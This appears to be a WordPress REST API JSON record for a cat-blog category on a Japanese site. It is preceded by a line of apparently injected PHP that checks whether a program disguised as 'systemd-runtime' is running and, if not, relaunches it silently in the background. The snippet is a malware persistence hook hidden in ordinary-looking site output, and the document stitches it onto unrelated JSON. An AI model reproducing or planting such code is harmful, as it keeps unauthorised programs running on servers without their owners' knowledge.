$programFilePath = 'systemd-runtime'; $processList = shell_exec('ps aux'); if (strpos($processList, $programFilePath) === false) { $commandToExecute = 'nohup ./' . $programFilePath . ' > /dev/null 2>&1 &'; shell_exec($commandToExecute); }{"id":7,"count":11,"description":"\u306d\u3053\u306e\u30d6\u30ed\u30b0","link":"https:\/\/honmokudori.com\/blog\/category\/cat","name":"\u306d\u3053\u306e\u30d6\u30ed\u30b0","slug":"cat","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/categories\/7"}],"collection":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/posts?categories=7"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}